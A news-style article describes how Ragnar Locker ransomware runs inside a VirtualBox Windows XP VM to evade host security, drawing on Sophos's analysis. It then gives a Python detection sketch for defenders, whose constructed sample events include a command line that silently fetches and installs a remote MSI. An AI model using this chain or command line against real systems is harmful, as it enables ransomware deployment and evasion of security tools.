Ragnar Locker, the ransomware disguised as a kind of virtual machine
Recall that in April the Portuguese energy company EDP was hit by ransomware.
The direct consequence of this cyberattack was the theft of more than 10TB of sensitive information. The malware used to carry it out is known as Ragnar Locker, and this ransomware has one very particular feature: its operators can deploy it camouflaged inside a virtual machine.
Sophos, a cybersecurity company, has identified eight steps in the analysis that links the original causes of a malware operation to the Ragnar Locker program. The security vendor describes how this ransomware manages to camouflage itself and go unnoticed. In a blog post, Sophos writes: "In a recently detected attack, the Ragnar Locker ransomware was deployed in a virtual Oracle VirtualBox Windows XP machine. The payload of the attack was a 122MB installation program with a 282MB virtual image inside, all to hide a 49K ransomware executable." The approach evidently works: Energias de Portugal, the Portuguese energy giant, fell victim to this malware. The cyber criminals demanded a ransom of $11 million, or 1,580 bitcoins at the time.
Before this large-scale attack, the operators of Ragnar Locker typically gained entry through Windows RDP connections. In this way they could compromise the network's security, break into the system and gather information. To complete the intrusion they escalated to administrator privileges, using tools such as GPO and PowerShell: "In the detected attack, Ragnar Locker actors used a GPO task to run Microsoft Installer (msiexec.exe), passing settings that silently download and install a 122MB crafted, unsigned MSI package from a remote web server," says the computer security firm.
In more detail, "the malicious package is built around a working installation of an old Oracle VirtualBox hypervisor (Sun xVM VirtualBox v3.0.4, dated August 5, 2009) coupled with a micro.vdi virtual disk image file (an image of a stripped-down version of Windows XP SP3 called MicroXP v0.82, embedding the Ragnar Locker executable)," explains Dominique Filippone, a journalist. "Once the package is copied into the 'VirtualAppliances' directory under Program Files (x86), the malware deploys an executable (va.exe), a batch file (install.bat) and some support files," he adds. For its part, Sophos notes: "The MSI installation program runs va.exe, which in turn executes the install.bat script. The first task of the script is to register and run the VirtualBox application extensions VBoxC.dll and VBoxRT.dll that are needed, as well as the VirtualBox driver VboxDrv.sys."
Once the software is in place on the targeted computer or network, the cyber criminals' strategy is to disable certain notification features such as Windows AutoPlay. Next, a command erases the shadow copies on the targeted machine, so that any attempt to restore unencrypted documents will fail. The program then enumerates the hard drives installed in the machine and the network drives mapped on the physical host, and configures them so that they can be reached from the virtual machine. "The virtual machine is configured with 256MB of RAM, 1 CPU, a single 299MB micro.vdi HDD file and an Intel PRO/1000 network card connected to the NAT," Sophos says. From there, the cyber criminals can encrypt the files, thereby holding the system hostage. "Because the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unimpeded because they are out of reach of security software on the physical host machine. Data on disks and drives accessible on the physical machine is attacked by the legitimate VboxHeadless.exe VirtualBox virtualization software," explains the cybersecurity firm.
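The chain described above leaves a recognisable footprint on the host: msiexec.exe fetching and silently installing a package from a remote URL, VirtualBox components (VboxDrv.sys, VBoxHeadless.exe) appearing outside the product's normal install directory, and a headless VM launched from a batch script. The following is an added detection example written for this article; it is not code from Sophos or from the ransomware operators. It assumes Sysmon-style process-creation fields (ts, host, parent, image, cmdline), assumes the driver is registered with `sc create` (the article only says the script registers and runs VboxDrv.sys), assumes VirtualBox is normally installed under `\Oracle\VirtualBox\`, and uses constructed hostnames, timestamps and a documentation IP address.

```python
"""Detection sketch for VM-wrapped ransomware in the style of the Ragnar Locker chain.

Added example; field names follow Sysmon event 1, the sample events are constructed.
"""
from datetime import datetime, timedelta

# Constructed, Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2020-05-21T09:00:10", "host": "WS-17", "parent": "services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://198.51.100.7/update.msi /q"},
    {"ts": "2020-05-21T09:01:02", "host": "WS-17", "parent": "msiexec.exe",
     "image": r"C:\Program Files (x86)\VirtualAppliances\va.exe",
     "cmdline": r"va.exe"},
    {"ts": "2020-05-21T09:01:05", "host": "WS-17", "parent": "va.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Program Files (x86)\VirtualAppliances\install.bat"},
    # Assumption: the batch script registers the driver with sc.exe.
    {"ts": "2020-05-21T09:01:09", "host": "WS-17", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc create VBoxDrv type= kernel binPath= C:\Program Files (x86)\VirtualAppliances\VboxDrv.sys"},
    {"ts": "2020-05-21T09:01:40", "host": "WS-17", "parent": "cmd.exe",
     "image": r"C:\Program Files (x86)\VirtualAppliances\VBoxHeadless.exe",
     "cmdline": r"VBoxHeadless.exe --startvm micro"},
    # Benign: a locally downloaded MSI installed quietly by a user.
    {"ts": "2020-05-21T10:15:00", "host": "WS-20", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\jdoe\Downloads\tool.msi /qn"},
    # Benign: a developer's VirtualBox, started by the GUI from the normal path.
    {"ts": "2020-05-21T11:00:00", "host": "DEV-03", "parent": "VirtualBox.exe",
     "image": r"C:\Program Files\Oracle\VirtualBox\VBoxHeadless.exe",
     "cmdline": r"VBoxHeadless.exe --startvm ubuntu-test"},
]

VBOX_NAMES = ("vboxheadless.exe", "vboxdrv.sys", "vboxc.dll", "vboxrt.dll")
# Assumed default install directory of VirtualBox on the fleet (lower-cased).
STANDARD_VBOX_DIR = "\\oracle\\virtualbox\\"
QUIET_FLAGS = ("/q", "/qn", "/quiet")
VM_TAGS = {"vbox_component_unusual_path", "headless_vm_from_script"}


def tag_event(e):
    """Return the set of indicator tags a single process-creation event matches."""
    image, cmd, parent = e["image"].lower(), e["cmdline"].lower(), e["parent"].lower()
    tags = set()
    # msiexec pulling a package from a web server and installing it silently.
    if image.endswith("msiexec.exe") and ("http://" in cmd or "https://" in cmd) \
            and any(tok in QUIET_FLAGS for tok in cmd.split()):
        tags.add("remote_silent_msi")
    # VirtualBox binaries or driver referenced outside the product's install directory.
    blob = image + " " + cmd
    if any(name in blob for name in VBOX_NAMES) and STANDARD_VBOX_DIR not in blob:
        tags.add("vbox_component_unusual_path")
    # A headless VM started by a script interpreter rather than the VirtualBox GUI.
    if image.endswith("vboxheadless.exe") and parent in ("cmd.exe", "powershell.exe"):
        tags.add("headless_vm_from_script")
    return tags


def correlate(events, window=timedelta(minutes=30)):
    """Raise one high-severity alert per host where a remote silent MSI install is
    followed, within `window`, by VirtualBox components appearing in unusual ways."""
    by_host = {}
    for e in sorted(events, key=lambda ev: ev["ts"]):
        by_host.setdefault(e["host"], []).append(e)
    alerts = []
    for host, evs in by_host.items():
        tagged = [(datetime.fromisoformat(e["ts"]), tag_event(e)) for e in evs]
        for i, (t0, tags0) in enumerate(tagged):
            if "remote_silent_msi" not in tags0:
                continue
            followers = [(t, tg) for t, tg in tagged[i + 1:]
                         if t - t0 <= window and tg & VM_TAGS]
            if followers:
                alerts.append({
                    "host": host, "severity": "high",
                    "start": t0.isoformat(), "end": followers[-1][0].isoformat(),
                    "tags": tags0 | set().union(*(tg for _, tg in followers)),
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Each tag on its own is noisy (administrators do install MSIs quietly, and developers do run VirtualBox), so the alert fires only on the sequence: remote quiet install, then VirtualBox components in an unexpected location or a headless VM started from a script, on the same host within the time window. Pointing `correlate` at real process-creation telemetry means only renaming the five fields.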